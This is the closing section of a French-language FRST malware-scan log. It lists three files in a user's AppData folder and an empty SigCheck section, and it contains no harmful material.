2021-05-02 20:50 - 2021-05-02 20:50 - 000016438 _____ () C:\Users\aston\AppData\Local\partner.bmp
2021-01-08 07:48 - 2021-01-08 07:52 - 000012129 _____ () C:\Users\aston\AppData\Local\PlariumPlay.log
2020-05-22 14:11 - 2020-11-22 11:10 - 000007588 _____ () C:\Users\aston\AppData\Local\Resmon.ResmonCfg

==================== SigCheck ============================

(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas Ã  la vÃ©rification.)

==================== Fin de FRST.txt ========================